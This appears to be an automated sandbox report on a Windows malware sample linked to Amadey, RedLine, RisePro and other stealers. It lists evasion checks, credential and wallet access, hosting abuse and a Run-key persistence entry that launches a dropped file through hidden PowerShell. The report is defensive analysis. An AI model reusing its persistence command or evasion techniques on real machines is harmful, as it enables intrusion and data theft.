Malware Analysis Report

2024-07-11 07:57

Sample ID 240531-2c59aaff6t
Target c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f
SHA256 c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f
Tags
amadey exelastealer risepro 0e6740 49e482 discovery evasion execution persistence spyware stealer trojan asyncrat privateloader redline stealc 1 @logscloudyt_bot fresh fresh run zzvv bootkit infostealer loader rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f

Threat Level: Known bad

The file c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f was found to be: Known bad.

Malicious Activity Summary

amadey exelastealer risepro 0e6740 49e482 discovery evasion execution persistence spyware stealer trojan asyncrat privateloader redline stealc 1 @logscloudyt_bot fresh fresh run zzvv bootkit infostealer loader rat

RedLine

PrivateLoader

Amadey

Stealc

Modifies firewall policy service

RisePro

Exela Stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

AsyncRat

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Grants admin privileges

Async RAT payload

Modifies Windows Firewall

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads data files stored by FTP clients

Identifies Wine through registry keys

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Checks BIOS information in registry

Drops desktop.ini file(s)

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops Chrome extension

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Command and Scripting Interpreter: PowerShell

Unsigned PE

Runs net.exe

Enumerates system info in registry

Enumerates processes with tasklist

Kills process with taskkill

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Gathers system information

Checks processor information in registry

Views/modifies file attributes

Runs ping.exe

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Collects information from the system

Modifies data under HKEY_USERS

Gathers network information

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-31 22:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 22:27

Reported

2024-05-31 22:29

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe"

Signatures

Amadey

trojan amadey

Exela Stealer

stealer exelastealer

RisePro

stealer risepro

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7ec52fcc46.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\7ec52fcc46.exe" C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1000043001\\volumeinfo.exe'\"" C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 708 set thread context of 824 N/A C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\1000004002\cfe1e50b73.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
N/A N/A C:\Users\Admin\1000004002\cfe1e50b73.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
